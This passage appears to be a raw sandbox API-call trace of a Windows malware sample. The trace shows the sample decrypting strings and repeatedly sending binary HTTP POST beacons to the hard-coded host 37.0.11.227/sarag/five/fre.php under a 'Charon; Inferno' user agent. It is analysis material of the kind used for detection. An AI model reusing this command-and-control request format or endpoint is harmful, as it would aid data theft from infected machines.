dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0197.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.807] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.808] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.808] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.808] GetProcessHeap () returned 0x690000 [0197.809] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0197.809] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.810] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0197.810] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.811] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0197.811] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.812] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0197.812] GetProcessHeap () returned 0x690000 [0197.812] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0197.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.812] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0197.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.813] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0197.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.814] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0197.815] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.815] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0197.815] GetProcessHeap () returned 0x690000 [0197.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0197.815] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adce8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0197.815] GetProcessHeap () returned 0x690000 [0197.815] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab380 [0197.815] socket (af=2, type=1, protocol=6) returned 0x40c [0197.816] connect (s=0x40c, name=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0197.841] FreeAddrInfoW (pAddrInfo=0x6adce8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aea18*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0197.841] GetProcessHeap () returned 0x690000 [0197.841] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0197.841] GetProcessHeap () returned 0x690000 [0197.841] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0197.842] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0197.843] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0197.843] GetProcessHeap () returned 0x690000 [0197.843] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0197.843] GetProcessHeap () returned 0x690000 [0197.844] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0197.844] GetProcessHeap () returned 0x690000 [0197.844] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0197.844] GetProcessHeap () returned 0x690000 [0197.844] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0197.845] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0197.845] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0197.845] GetProcessHeap () returned 0x690000 [0197.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0197.845] GetProcessHeap () returned 0x690000 [0197.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0197.846] send (s=0x40c, buf=0x6abd08*, len=242, flags=0) returned 242 [0197.846] send (s=0x40c, buf=0x6aba40*, len=159, flags=0) returned 159 [0197.846] GetProcessHeap () returned 0x690000 [0197.847] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0197.847] recv (in: s=0x40c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0197.937] GetProcessHeap () returned 0x690000 [0197.937] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0197.937] GetProcessHeap () returned 0x690000 [0197.937] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0197.937] GetProcessHeap () returned 0x690000 [0197.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afe00 | out: hHeap=0x690000) returned 1 [0197.938] GetProcessHeap () returned 0x690000 [0197.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0197.938] closesocket (s=0x40c) returned 0 [0197.939] GetProcessHeap () returned 0x690000 [0197.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab380 | out: hHeap=0x690000) returned 1 [0197.939] GetProcessHeap () returned 0x690000 [0197.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0197.939] GetProcessHeap () returned 0x690000 [0197.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0197.939] GetProcessHeap () returned 0x690000 [0197.940] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0197.958] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x121c) returned 0x40c [0197.960] Sleep (dwMilliseconds=0xea60) [0197.965] GetProcessHeap () returned 0x690000 [0197.965] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0197.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.966] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0197.972] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.972] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0197.977] GetProcessHeap () returned 0x690000 [0197.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0197.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.978] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0197.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.979] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0197.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.980] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0197.980] GetProcessHeap () returned 0x690000 [0197.981] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0197.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.984] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0197.984] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.985] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0197.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.985] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0197.986] GetProcessHeap () returned 0x690000 [0197.986] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0197.986] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.989] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0197.989] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.990] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0197.990] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.990] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0197.991] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0197.991] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0197.991] GetProcessHeap () returned 0x690000 [0197.991] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0197.991] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0197.992] GetProcessHeap () returned 0x690000 [0197.992] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0197.992] GetProcessHeap () returned 0x690000 [0197.993] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0197.993] GetProcessHeap () returned 0x690000 [0197.993] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0197.993] GetProcessHeap () returned 0x690000 [0197.993] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0197.994] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0197.995] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.001] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0198.007] GetProcessHeap () returned 0x690000 [0198.007] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0198.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.008] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0198.009] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.009] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.010] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.010] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.010] GetProcessHeap () returned 0x690000 [0198.010] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0198.011] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.012] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0198.012] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.013] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0198.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.013] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0198.013] GetProcessHeap () returned 0x690000 [0198.013] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0198.014] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.014] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0198.015] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.015] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0198.016] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.016] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0198.017] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.017] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0198.017] GetProcessHeap () returned 0x690000 [0198.017] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0198.017] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6adea0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae880*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0198.017] GetProcessHeap () returned 0x690000 [0198.017] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0198.018] socket (af=2, type=1, protocol=6) returned 0x410 [0198.018] connect (s=0x410, name=0x6ae880*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0198.040] FreeAddrInfoW (pAddrInfo=0x6adea0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6ae880*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0198.041] GetProcessHeap () returned 0x690000 [0198.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0198.041] GetProcessHeap () returned 0x690000 [0198.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b2fb8 [0198.041] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0198.042] wvsprintfA (in: param_1=0x6b2fb8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0198.042] GetProcessHeap () returned 0x690000 [0198.042] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0198.042] GetProcessHeap () returned 0x690000 [0198.043] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0198.043] GetProcessHeap () returned 0x690000 [0198.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0198.043] GetProcessHeap () returned 0x690000 [0198.043] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b2fb8 [0198.044] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0198.044] wvsprintfA (in: param_1=0x6b2fb8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0198.044] GetProcessHeap () returned 0x690000 [0198.044] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6abd08 [0198.044] GetProcessHeap () returned 0x690000 [0198.045] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b2fb8 | out: hHeap=0x690000) returned 1 [0198.045] send (s=0x410, buf=0x6abd08*, len=242, flags=0) returned 242 [0198.045] send (s=0x410, buf=0x6aba40*, len=159, flags=0) returned 159 [0198.045] GetProcessHeap () returned 0x690000 [0198.045] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0198.045] recv (in: s=0x410, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0198.120] GetProcessHeap () returned 0x690000 [0198.121] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0198.121] GetProcessHeap () returned 0x690000 [0198.121] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0198.122] GetProcessHeap () returned 0x690000 [0198.122] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0198.123] GetProcessHeap () returned 0x690000 [0198.123] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0198.123] closesocket (s=0x410) returned 0 [0198.124] GetProcessHeap () returned 0x690000 [0198.124] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0198.124] GetProcessHeap () returned 0x690000 [0198.125] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0198.125] GetProcessHeap () returned 0x690000 [0198.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0198.126] GetProcessHeap () returned 0x690000 [0198.126] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0198.127] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1220) returned 0x410 [0198.131] Sleep (dwMilliseconds=0xea60) [0198.133] GetProcessHeap () returned 0x690000 [0198.133] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0198.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.135] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.158] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0198.165] GetProcessHeap () returned 0x690000 [0198.165] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0198.166] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.166] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0198.172] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.172] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.173] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.173] GetProcessHeap () returned 0x690000 [0198.174] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0198.175] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.176] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0198.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.186] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0198.186] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.187] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0198.187] GetProcessHeap () returned 0x690000 [0198.187] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0198.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.188] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0198.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.189] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0198.189] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.189] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0198.190] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0198.190] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0198.190] GetProcessHeap () returned 0x690000 [0198.190] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0198.190] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0198.191] GetProcessHeap () returned 0x690000 [0198.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0198.191] GetProcessHeap () returned 0x690000 [0198.191] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0198.191] GetProcessHeap () returned 0x690000 [0198.192] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0198.192] GetProcessHeap () returned 0x690000 [0198.192] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0198.193] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.193] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0198.199] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.200] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0198.206] GetProcessHeap () returned 0x690000 [0198.206] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0198.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.207] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0198.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.208] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0198.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.209] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0198.209] GetProcessHeap () returned 0x690000 [0198.209] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0198.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.210] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0198.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.211] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0198.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0198.212] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0198.212] GetProcessHeap () returned 0x690000 [0198.212] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, 